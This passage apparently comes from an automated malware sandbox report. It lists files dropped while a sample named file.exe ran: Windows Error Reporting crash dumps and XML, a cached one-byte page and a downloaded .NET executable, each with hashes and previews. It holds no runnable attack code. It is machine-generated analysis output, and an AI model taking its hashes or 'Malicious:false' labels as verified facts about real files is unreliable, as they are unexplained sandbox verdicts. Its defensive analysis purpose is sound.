                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4CC.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:30:52 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):115316
                                                      Entropy (8bit):2.072510660517891
                                                      Encrypted:false
                                                      SSDEEP:384:acmvCLbPD7bV444RLH54twYXmxOYc1vrNLNROjHwUeKs4zZHQLzbeOjuMiloD:hbPDHV54v4tz1vhZROMHn65g
                                                      MD5:0E171C8E023BAF9AFA2A47F1801C9687
                                                      SHA1:7ED53AD0A6A54E7AD1DB239B3A0B02AE0E44DFED
                                                      SHA-256:729D072AF447D030D160583689A731A30C9AE89BBEB74C0AFE5D5DC639628B70
                                                      SHA-512:0025821F5FF48551754D06B877F1A324D33DA128263AE862AAD3DEAC531E99ED45A1B12979F5A03EC481C54CE1385BA18EC88B5ABBF48E59D6D01B4A64D74C9B
                                                      Malicious:false
                                                      Preview:MDMP....... ........~;c............D...............L............N..........T.......8...........T...........P=..$...........\!..........H#...................................................................U...........B.......#......GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA550.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.458779439734889
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjb8fm8M4JblMF9w+q8vclCr8MjTzd:uITfh/zgrsqYMJpOwKoCr8MXzd
                                                      MD5:6FC280E101469D3EC90CF2839259B200
                                                      SHA1:BD90383C3E3684BE029872488E632CBD7FCA733F
                                                      SHA-256:B72737167A3108C3D2C6DD64EF4C228929668CEC5FF479E83BB94157F7B16AA3
                                                      SHA-512:9AD63E71C2C7A7BB3E7D4903230346F5052FF23D454AC3E5B6D9D97AAB3B6CD945FB68BB583FB56C4C7C3C58477A20FA1EEF037C72EE29304F213E0E3B4807D7
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA77D.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8404
                                                      Entropy (8bit):3.694330330368768
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/Cj6Xj6YBSPSUqgmf6oSR1sCpBm89bpysfbDm:RrlsNiW6Xj6YB6SUqgmf5ST5pxfO
                                                      MD5:B656135048B204116DC5FFA2D958977F
                                                      SHA1:6B3BABEAD4636FF1B48A8992EF31FF1ACD91AAD8
                                                      SHA-256:D8ADFF43F5130C3773E14A2ADBD852938A739F7A39B587748B6481CF7D34A58A
                                                      SHA-512:4FD8EB649D011087C9070D0672F26C26A488047674A36A79FE97298BF1C3A0493B15F8A7ADDAAB7A09A6378F3CF141AE137BC35DFF141CA3418AAD8368638316
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA849.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.45654686969491
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsoJgtWI9cSWgc8sqYj48fm8M4JbIMF/d+q8vcICr8MjTzd:uITfu/zgrsqYJJM4KxCr8MXzd
                                                      MD5:EE5D573C520D7E74E7BDC66313779C2A
                                                      SHA1:FE359D5641AAFB1F185719E4B4F0E3109C7EDE88
                                                      SHA-256:882C002B2BF4B30B0D1566FCDB85E7BB49F37CA1A790AD8AB4006FA0A702F26E
                                                      SHA-512:EB27951B0ADF6F216BCB606E5FE43C0EECD909DA3EC580EA10C65EA1BCC58F3DC156C62BCA9BFDA7A16A41B1604B27B9A5E83A71CD4B2E3068E9AB615E8D61B5
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719941" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB28D.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:50 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):85922
                                                      Entropy (8bit):2.042682057237551
                                                      Encrypted:false
                                                      SSDEEP:384:1sP67P0bSdGWxubKYXcPOH5T4LNpOjHY0zdSqmK+d:1b7PGFW0b/MZpOUBqmKU
                                                      MD5:323B1369AE060404F099D7A548F8BCF7
                                                      SHA1:205016ACE3D79583228472271163791553165AA0
                                                      SHA-256:BD660BC723F51C81DC2001E46D443915B39ECF45CCD7969115C8481A9FD60C15
                                                      SHA-512:3F0F47C26F736CD5A113A1F778222DF468C94F075EC62E054EB6913E4F1DD9B75168158B6BB635C4C8604905E9192E12EB00848F204EBF46BC38A31BF5A3108A
                                                      Malicious:false
                                                      Preview:MDMP....... .......~~;c........................x...............H<..........T.......8...........T...........P$..R+..........4........... ....................................................................U...........B..............GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB608.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8394
                                                      Entropy (8bit):3.694487454395994
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CF6I7WQ6YBS3SUAgmf6TS4CpBO89brysfwZm:RrlsNiw6I7h6YBySUAgmf+SFrxfT
                                                      MD5:A9D3BEB83A3A49BAFC7FAD69FECE0815
                                                      SHA1:0E63BE8A5C09237C7361856D42A9A3E2A2E63D6F
                                                      SHA-256:7D8899D27833F79CDF96CB830B567CC199B50266A0091DCDBFA76F64CBD76BB9
                                                      SHA-512:192F9A0E4BB3B2A5B84EE44C34C06EBB27B540B24CB10DB640996BCFD65911D9AFC231FBB01846B55FE0E4618576459BB4206B5F9505FF4F5CD26B9126B819FC
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6A5.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.458664894658237
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjV8fm8M4JblMFB+q8vclCr8MjTzd:uITfh/zgrsqYeJpYKoCr8MXzd
                                                      MD5:23444136DE422A5136DC8B6B34A7CA3F
                                                      SHA1:B61755F4AA63F2A6A99BF73277282F783BE293D8
                                                      SHA-256:00BCEE5104EE16CB5B214D848E44783A479730826CC38BE6804C9E82CDF60C76
                                                      SHA-512:18382FA0FDA0EFA448AC1CE5651F5A14FC0531D134E77A6DA087CF79B81DA55D73E135BE96D9252545CCA0C51E9713DA8C6A05DC5C92F101926B34B544DAB270
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE54.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:53 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):94676
                                                      Entropy (8bit):2.03619832732963
                                                      Encrypted:false
                                                      SSDEEP:384:BPwyPhVnUbsJ9PuiYXcPObDUT4LNpOjHYIzADGBqEX7LtMRYB4bkyP:+yPzxJ9PuxUMZpOUAMP
                                                      MD5:C7A947FFB5664EB838577C8A5AFB8A2E
                                                      SHA1:58011E9C9BCC42A5C84FCFF6F7E8469CBDF82115
                                                      SHA-256:07A75195B2B86B1A927250E1E7932C2948AA1D95204797B2A46B9645ABD28E3D
                                                      SHA-512:40E8BB0AFD2BBDC4A7B75EA547158878DA02B903D57CA4BF136F8428488142E3D003CA91EC5FEFA39E7ACB83188328DC604A01C358DFA06330B3313FE0D42615
                                                      Malicious:false
                                                      Preview:MDMP....... ........~;c........................x...............D?..........T.......8...........T...........x$..\M..........d...........P....................................................................U...........B..............GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1DF.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8394
                                                      Entropy (8bit):3.6958151770219105
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CK6Izp+6YBShSUpbkSgmf6TS4CpBk89bwysffkwm:RrlsNiP6IzQ6YB0SUDgmf+SDwxfa
                                                      MD5:BAEA939A33C066CDAC533ED4BB07685C
                                                      SHA1:78509AEC3E43E7801442F28BD094E68511B87096
                                                      SHA-256:1A072632181920CF9C70CAD46F74D4274A83199997C53A2D2FF2328B15B6A902
                                                      SHA-512:A21F4AF0E3DDD5B3AA72800A0836F21BA4751E80DB7CE9BD3835868BA0407ECC12A2266B2C53942F250A35AB9CC41261DA4CBB3C0B53975E7C868CEC22F9342E
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC26D.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.458457061278479
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYj+8fm8M4JblMFF+q8vclCr8MjTzd:uITfh/zgrsqY3JpwKoCr8MXzd
                                                      MD5:7FFD213E5875EB41AEF4C2FBBFB57C5C
                                                      SHA1:F91A9D0A82A0E6BE6F8E77E4D90EAC8951254CDB
                                                      SHA-256:D1B81B11648E0F6833FF746275B2D9252B31FC5F8226CCA7C45B834EA84668F0
                                                      SHA-512:9D091BCC0E8132C9FDF24897078166326082F66E4EE59D6EE6183DD161E679BB6700726CD0E22A165EC2C10B1EAC3A1FC8BF04E8D9E0A13DC3C28872B711598B
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC980.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:55 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):103386
                                                      Entropy (8bit):2.0851608891850866
                                                      Encrypted:false
                                                      SSDEEP:384:EpwjGizPDGYjUdeztRtFZYXmPOFncZarT4LNpOjHwveXzoYZfvr0ZWP:kHiPy+UdeztRtFUlMZpOM2fD0
                                                      MD5:ED9A797712F185529B05E65284A4C5A2
                                                      SHA1:926267A934EEF1FC491C41EA8C9D7F2925D62D66
                                                      SHA-256:D8AA8B659BC463CBA9F2057660ADC8D6BD5A2DC769E8BE86444C516CAB0C5367
                                                      SHA-512:B436071DE0F12B0CBED80F845269ACCF4449A4C1D4F2A20906A58BC7FEF0846C44B3BE374E5F9DB46D2DF6DFDB1D9BE8691C37B87112C853ACC4CFDC4E8EA7E1
                                                      Malicious:false
                                                      Preview:MDMP....... ........~;c.........................................C..........T.......8...........T...........@*...i...........................................................................................U...........B......\.......GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC01.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8394
                                                      Entropy (8bit):3.6955265060547693
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CR6Iaxt6YBStSUHpgmf6TS4CpBY89bdysfw/m:RrlsNiE6Iaxt6YB4SUJgmf+SHdxfV
                                                      MD5:D60843507CAB3A23073630B0FBDA8E1C
                                                      SHA1:1B4FA2E29515EC4C697F5EB75132DE2C7AE3D58B
                                                      SHA-256:C691854134DA01AB60B97E96E02DC9DCB6464F13A163808CC0B8B1C711D03EFF
                                                      SHA-512:2105DBFFFA3D30D8124E01F27DFBF86320DD81CCC3AC77202FD59C2FCD253413425E1AD79909E9CE807163FBE52F66053DAA0C08C64066E9B7C90E10BF9D4E53
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC9E.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.459801496716276
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjh8fm8M4JblMFO+q8vclCr8MjTzd:uITfh/zgrsqYaJp/KoCr8MXzd
                                                      MD5:63751B32A60BE5D04952043392BE8999
                                                      SHA1:6C5A2FA9D95FE64D22225C8666D3F027E3101561
                                                      SHA-256:93A1C016CDBCB4A635D68282899146ABFC38D41CABDD688E51300A734BBDF719
                                                      SHA-512:F48960461ED86D01B81AD6D52A3F9A144579558419162C0E5A0979B37731865114391235840FFE7D2FB37928FBC30BBD69D37B4B0A8EA49B1E06B5545FBB418E
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\library[1].htm

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\soft[1]

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3947920
                                                      Entropy (8bit):7.275018147968825
                                                      Encrypted:false
                                                      SSDEEP:49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
                                                      MD5:04514BD4962F7D60679434E0EBE49184
